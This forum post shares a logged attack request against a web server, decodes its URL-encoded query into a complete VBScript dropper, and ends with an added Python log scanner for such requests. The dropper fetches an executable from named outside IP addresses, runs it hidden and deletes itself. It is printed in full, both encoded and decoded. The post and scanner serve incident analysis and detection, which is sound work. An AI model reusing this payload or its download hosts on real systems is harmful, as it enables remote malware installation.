Hi,
I caught this one in a pre-production server's logs. Seems it is trying to get the root document, and trying to force your server to run various setup.exe programs from a host of sites (assuming your root document processes the search variable). Our site does not, as it is the default IIS 7.5 document (the "Welcome to IIS 7" page). The exploit is coming out of China (surprise, surprise...).
I replaced the public IP of our server with x's to conceal its actual IP ;-)
In the server logs, I found:
2014-09-22 20:58:50 xxx.xxx.xx.xx GET / search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222.vbs.} 80 - 122.228.207.244 - 200 0 0 421
Decoding the URI request string passed to search== yields the following VBScript:
exec cmd.exe /c echo>22222.vbs
dim wait,quit,out
Set xml=CreateObject("Microsoft.XMLHTTP")
Set WshShell = Wscript.CreateObject("WScript.Shell")
DS=Array("123.108.109.100","123.108.109.100:53","123.108.109.100:443","178.33.196.164","178.33.196.164:53","178.33.196.164:443")
' try each download host in turn; stop at the first one that answers 200
for each Url in DS
wait=true
quit=false
D(Url)
if quit then
exit for
end if
next
Sub D(Url)
if IsObject(xml)=false then
Set xml=CreateObject("Microsoft.XMLHTTP")
end if
xml.Open "GET","http://"&Url&"/getsetup.exe",True
xml.OnReadyStateChange=GetRef("xmlstat")
out=Now
xml.Send()
' wait up to 60 seconds for the asynchronous request to complete
while(wait and 60>abs(datediff("s",Now,out)))
wscript.sleep(1000)
wend
End Sub
sub xmlstat()
If xml.ReadyState<>4 Then
exit sub
end if
wait=false
if xml.status<>200 then
exit sub
end if
quit=true
on error resume next
' write the response body to ko.exe
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xml.ResponseBody
sGet.SaveToFile "ko.exe",2
End sub
' run ko.exe hidden, then delete this script; the trailing "& cscript 22222.vbs" is the second cmd.exe command that launches it
WshShell.run "ko.exe",0,0
Set fso =CreateObject("Scripting.Filesystemobject")
fso.DeleteFile(WScript.ScriptFullName) & cscript 22222.vbs
I'm guessing that this doesn't run unless your root page is a) dynamic, and b) has a search variable (and, presumably, some sort of vulnerability)?
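The `{.exec|...}` construct in the query is the template-macro syntax of Rejetto HTTP File Server (HFS), which IIS does not interpret, so on an IIS host this request is something to detect and block rather than a working exploit. The script below is an added example, not part of the original post: it parses IIS W3C log lines, URL-decodes cs-uri-query, strips the cmd.exe caret escapes (the reason `^>` survived in the decoding above), flags the macro injection and pulls out the second-stage download hosts. The log excerpt is constructed, with the query shortened and the server IP replaced by a placeholder.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt: a benign request plus a shortened copy of the
# post's macro-injection request (query trimmed; same client IP and download hosts).
SAMPLE_LOG = """\
2014-09-22 20:58:49 10.0.0.5 GET / - 80 - 198.51.100.7 - 200 0 0 12
2014-09-22 20:58:50 10.0.0.5 GET / search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+DS%3DArray%28%22123.108.109.100%22%2C%22178.33.196.164%3A443%22%29%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue.} 80 - 122.228.207.244 - 200 0 0 421
"""

# Field order of the default IIS W3C logging layout (cs(User-Agent) is "-" here).
FIELDS = ("date", "time", "s_ip", "method", "uri_stem", "uri_query", "s_port",
          "username", "c_ip", "user_agent", "status", "substatus", "win32_status",
          "time_taken")

MACRO_RE = re.compile(r"\{\.exec\|", re.IGNORECASE)  # {.exec|...} template macro
IPV4_PORT_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")

def parse_w3c(line):
    """Split one W3C log line into a dict; None for comment or short lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    return dict(zip(FIELDS, parts)) if len(parts) >= len(FIELDS) else None

def decode_query(query):
    """URL-decode cs-uri-query and drop the cmd.exe caret escapes (^> ^< ^&),
    giving the text that echo>22222.vbs would actually write to disk."""
    return re.sub(r"\^(.)", r"\1", unquote_plus(query))

def is_macro_injection(query):
    """True when the decoded query carries the {.exec| macro seen in the post."""
    return MACRO_RE.search(decode_query(query)) is not None

def download_hosts(decoded):
    """Second-stage download hosts (IPv4[:port]) named in the decoded payload."""
    return sorted(set(IPV4_PORT_RE.findall(decoded)))

def scan_log(text):
    """Return one finding per injection attempt: time, client, status, hosts."""
    findings = []
    for line in text.splitlines():
        rec = parse_w3c(line)
        if rec and is_macro_injection(rec["uri_query"]):
            decoded = decode_query(rec["uri_query"])
            findings.append({"when": rec["date"] + " " + rec["time"],
                             "client": rec["c_ip"], "status": rec["status"],
                             "null_byte": "\x00" in decoded,
                             "hosts": download_hosts(decoded)})
    return findings
```

Run `scan_log` over a real log file's contents to list each attempt with its client IP and the hosts it would have pulled getsetup.exe from; those hosts are the values worth feeding to egress filtering.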